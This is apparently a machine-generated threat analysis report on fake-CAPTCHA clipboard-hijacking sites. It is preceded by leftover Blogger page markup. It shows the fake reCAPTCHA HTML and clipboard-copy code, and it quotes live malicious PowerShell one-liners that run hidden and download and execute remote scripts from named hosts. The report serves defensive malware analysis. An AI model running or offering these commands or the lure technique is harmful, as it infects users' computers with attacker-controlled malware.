container'>\n</div>\n<div class='blog-pager container' id='blog-pager'>\n</div>\n</div>\n</div>\n</main>\n</div>\n<footer class='footer section' id='footer' name='Footer'><div class='widget Attribution' data-version='2' id='Attribution1'>\n<div class='widget-content'>\n<div class='blogger'>\n<a href='https://www.blogger.com' rel='nofollow'>\n<svg class='svg-icon-24'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_post_blogger_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\nPowered by Blogger\n</a>\n</div>\n<div class='image-attribution'>\nTheme images by <a href=\"http://www.offset.com/photos/394244\">Michael Elkan</a>\n</div>\n</div>\n</div></footer>\n</div>\n</div>\n</div>\n<aside 
class='sidebar-container container sidebar-invisible' role='complementary'>\n<div class='navigation'>\n<button class='svg-icon-24-button flat-icon-button ripple sidebar-back'>\n<svg class='svg-icon-24'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_arrow_back_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</button>\n</div>\n<div class='sidebar_top_wrapper'>\n<div class='sidebar_top section' id='sidebar_top' name='Sidebar (Top)'><div class='widget Profile' data-version='2' id='Profile1'>\n<div class='wrapper solo'>\n<div class='widget-content individual'>\n<a href='https://www.blogger.com/profile/02686294779557843862' rel='nofollow'>\n<div class='default-avatar-wrapper'>\n<svg class='svg-icon-24 avatar-icon'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_person_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</div>\n</a>\n<div class='profile-info'>\n<dl class='profile-datablock'>\n<dt class='profile-data'>\n<a class='profile-link g-profile' href='https://www.blogger.com/profile/02686294779557843862' rel='author nofollow'>\nWeesepuld\n</a>\n</dt>\n</dl>\n<a class='profile-link visit-profile pill-button' href='https://www.blogger.com/profile/02686294779557843862' rel='author'>\nVisit profile\n</a>\n</div>\n</div>\n</div>\n</div></div>\n</div>\n<div class='sidebar_bottom section' id='sidebar_bottom' name='Sidebar (Bottom)'>\n<div class='widget ReportAbuse' data-version='2' id='ReportAbuse1'>\n<h3 class='title'>\n<a class='report_abuse' href='https://www.blogger.com/go/report-abuse' rel='noopener nofollow' target='_blank'>\nReport Abuse\n</a>\n</h3>\n</div></div>\n</aside>\n<script type=\"text/javascript\" src=\"https://resources.blogblog.com/blogblog/data/res/2705757678-indie_compiled.js\" async=\"true\"></script>\n\n<script type=\"text/javascript\" src=\"https://www.blogger.com/static/v1/widgets/4071838938-widgets.js\"></script>\n<script type='text/javascript'>\nwindow['__wavt'] = 
'AOuZoY7CVEvgYI50kwr0zWHtA7eI90dl-A:1745423370361';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\\x3d3967763303726818370','//staplebrokenmetaliyro.blogspot.com/','3967763303726818370');\n_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '3967763303726818370', 'title': 'staplebrokenmetal', 'url': 'https://staplebrokenmetaliyro.blogspot.com/', 'canonicalUrl': 'https://staplebrokenmetaliyro.blogspot.com/', 'homepageUrl': 'https://staplebrokenmetaliyro.blogspot.com/', 'searchUrl': 'https://staplebrokenmetaliyro.blogspot.com/search', 'canonicalHomepageUrl': 'https://staplebrokenmetaliyro.blogspot.com/', 'blogspotFaviconUrl': 'https://staplebrokenmetaliyro.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\\x3clink rel\\x3d\\x22alternate\\x22 type\\x3d\\x22application/atom+xml\\x22 title\\x3d\\x22staplebrokenmetal - Atom\\x22 href\\x3d\\x22https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default\\x22 /\\x3e\\n\\x3clink rel\\x3d\\x22alternate\\x22 type\\x3d\\x22application/rss+xml\\x22 title\\x3d\\x22staplebrokenmetal - RSS\\x22 href\\x3d\\x22https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt\\x3drss\\x22 /\\x3e\\n\\x3clink rel\\x3d\\x22service.post\\x22 type\\x3d\\x22application/atom+xml\\x22 title\\x3d\\x22staplebrokenmetal - Atom\\x22 href\\x3d\\x22https://www.blogger.com/feeds/3967763303726818370/posts/default\\x22 /\\x3e\\n', 'meTag': '\\x3clink rel\\x3d\\x22me\\x22 href\\x3d\\x22https://www.blogger.com/profile/02686294779557843862\\x22 /\\x3e\\n', 'adsenseHostId': 
'ca-host-pub-1556223355139109', 'adsenseHasAds': true, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/11e6ba02c47cab30', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'X', 'key': 'twitter', 'shareMessage': 'Share to X', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\\x3cscript type\\x3d\\x22text/javascript\\x22\\x3ewindow.___gcfg \\x3d {\\x27lang\\x27: \\x27en\\x27};\\x3c/script\\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'index', 'pageName': '', 'pageTitle': 'staplebrokenmetal'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': true, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\\x3dsidebar'}, 
'snapshot': {'name': 'snapshot', 'url': '?view\\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\\x3dtimeslide'}, 'isMobile': false, 'title': 'staplebrokenmetal', 'description': '', 'url': 'https://staplebrokenmetaliyro.blogspot.com/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': true, 'isArchive': false, 'isLabelSearch': false}}, {'name': 'widgets', 'data': [{'title': 'Search This Blog', 'type': 'BlogSearch', 'sectionId': 'search_top', 'id': 'BlogSearch1'}, {'title': 'staplebrokenmetal (Header)', 'type': 'Header', 'sectionId': 'header', 'id': 'Header1'}, {'title': 'Blog Posts', 'type': 'Blog', 'sectionId': 'page_body', 'id': 'Blog1', 'posts': [], 'headerByline': {'regionName': 'header1', 'items': [{'name': 'share', 'label': ''}, {'name': 'timestamp', 'label': ''}]}, 'footerBylines': [{'regionName': 'footer1', 'items': [{'name': 'comments', 'label': 'comments'}, {'name': 'icons', 'label': ''}]}, {'regionName': 'footer2', 'items': [{'name': 'labels', 'label': ''}]}, {'regionName': 'footer3', 'items': [{'name': 'location', 'label': 'Location:'}]}], 'allBylineItems': [{'name': 'share', 'label': ''}, {'name': 'timestamp', 'label': ''}, {'name': 'comments', 'label': 'comments'}, {'name': 'icons', 'label': ''}, {'name': 'labels', 'label': ''}, {'name': 'location', 'label': 'Location:'}]}, {'title': '', 'type': 'PopularPosts', 'sectionId': 'page_body', 'id': 'PopularPosts1', 'posts': []}, {'type': 'Attribution', 'sectionId': 'footer', 'id': 'Attribution1'}, {'title': 'About Me', 'type': 'Profile', 'sectionId': 'sidebar_top', 'id': 'Profile1'}, {'title': '', 'type': 'ReportAbuse', 'sectionId': 'sidebar_bottom', 'id': 'ReportAbuse1'}]}]);\n_WidgetManager._RegisterWidget('_BlogSearchView', new _WidgetInfo('BlogSearch1', 'search_top', document.getElementById('BlogSearch1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 
'header', document.getElementById('Header1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'page_body', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'navMessage': 'No posts.', 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/2820493333-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/3681588378-lightbox_bundle.css'}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_PopularPostsView', new _WidgetInfo('PopularPosts1', 'page_body', document.getElementById('PopularPosts1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_AttributionView', new _WidgetInfo('Attribution1', 'footer', document.getElementById('Attribution1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_ProfileView', new _WidgetInfo('Profile1', 'sidebar_top', document.getElementById('Profile1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_ReportAbuseView', new _WidgetInfo('ReportAbuse1', 'sidebar_bottom', document.getElementById('ReportAbuse1'), {}, 'displayModeFull'));\n</script>\n</body>\n</html>", "ThreatLevel": "High" }
Technical Analysis
ClickGrab Threat Analysis Report - 2025-04-24
Most Common External Domains
- www.google.com: 30 occurrences
- use.fontawesome.com: 19 occurrences
- cdnjs.cloudflare.com: 15 occurrences
- staplebrokenmetaliyro.blogspot.com: 15 occurrences
- www.blogger.com: 13 occurrences
- www.webgo.de: 10 occurrences
- www.w3.org: 7 occurrences
- t.me: 6 occurrences
- browser.certif-update.website: 4 occurrences
- www.networksolutions.com: 2 occurrences
Common Pattern Analysis
reCAPTCHA imagery (19 occurrences, 1 distinct URL)
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (19 times)
Font resources (34 occurrences, 2 distinct URLs)
- https://use.fontawesome.com/releases/v5.0.0/css/all.css (19 times)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (15 times)
CDN hosted scripts (16 occurrences, 2 distinct URLs)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (15 times)
- https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 time)
Google resources (32 occurrences, 8 distinct URLs)
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (19 times)
- https://www.google.com/intl/en/policies/privacy/ (4 times)
- https://www.google.com/intl/en/policies/terms/ (4 times)
- http://www.google.com/2005/gml/b (1 time)
- http://www.google.com/2005/gml/data (1 time)
- ...and 3 more distinct URLs
JavaScript Clipboard Analysis
Found clipboard manipulation code snippets in 38 places
document.execCommand copy
Found in 38 snippets (100.0% of clipboard code)
Examples:
document.execCommand("copy")
textarea manipulation
Found in 38 snippets (100.0% of clipboard code)
Fake CAPTCHA HTML Examples
Here's how the fake CAPTCHA verification appears in HTML:
Example 1:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>
Example 2:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>
Command Context Analysis
Found 23 PowerShell download context snippets
stageClipboard Function
Found 15 references to stageClipboard function
Example stageClipboard contexts:
Example 1:
...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Example 2:
...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Example 3:
...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Malicious Commands
Found 4 commandToRun declarations
Malicious commands being prepared for clipboard:
Example 1:
Command:
powershell
Context:
WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...
Example 2:
Command:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Example 3:
Command:
powershell
Context:
...idden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Example 4:
Command:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...
PowerShell Parameters
Found 2 htaPath declarations
Malicious PowerShell parameters:
Example 1:
Parameters:
-w hidden -c \
Context:
...d; const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaP
Example 2:
Parameters:
-w hidden -c \
Context:
...const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...
Clipboard Attack Pattern Analysis
Based on the data analyzed, here's the complete clipboard attack pattern:
1. Initial Victim Engagement
The victim is shown a fake CAPTCHA verification UI with Google reCAPTCHA branding.
Common elements found:
- Google reCAPTCHA logo image
- Font resources from CDNs
- "I am not a robot" checkbox
Example Fake CAPTCHA HTML:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>...
2. Malicious Code Preparation
When the user clicks the verification checkbox:
- A 'commandToRun' variable is set with a malicious PowerShell command
- The command is typically obfuscated and often downloads second-stage payloads
- Common download destinations include:
Example Command Preparation Code:
WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...
3. Clipboard Hijacking
The malicious command is copied to the user's clipboard:
- A temporary textarea element is created
- The command is combined with verification text like "[CHECKMARK] I am not a robot"
- document.execCommand("copy") is used to copy to clipboard
- The temporary element is removed from the DOM
4. Social Engineering Component
The user sees a success message:
- The verification UI shows success with a checkmark symbol
- User is told they've passed verification
- The clipboard now contains the malicious command + verification text
5. Attack Objective
Final stage of the attack:
- When the user pastes the clipboard contents elsewhere (such as into a terminal)
- They see what looks like verification text
- But the PowerShell command at the start gets executed
- This downloads and runs additional malware from attacker-controlled servers
Reconstructed Attack Example
What's copied to clipboard:
powershell # [CHECKMARK] 'I am not a robot - reCAPTCHA Verification Hash: XY12Z345'
What the user sees when pasting: A verification success message
What actually happens: PowerShell executes the hidden malicious command
Conclusion
This is a sophisticated social engineering attack that tricks users into:
- Thinking they're completing a legitimate CAPTCHA
- Unknowingly copying malicious code to their clipboard
- Executing malware when they paste what they think is just verification text
Statistics
- Total sites analyzed: 31
- Sites with malicious content: 20
- Total unique domains: 24
- Total URLs extracted: 138